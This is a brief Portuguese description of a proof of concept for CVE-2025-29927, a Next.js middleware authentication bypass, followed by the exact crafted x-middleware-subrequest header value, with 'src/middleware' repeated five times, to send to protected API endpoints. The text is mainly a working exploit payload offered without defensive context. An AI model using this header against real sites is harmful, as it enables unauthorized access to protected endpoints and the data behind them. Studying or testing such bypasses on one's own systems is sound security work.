
Prova de conceito para CVE-2025-29927 que contorna a autenticação de middleware do Next.js enviando um cabeçalho x-middleware-subrequest manipulado para endpoints de API protegidos.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware como cabeçalho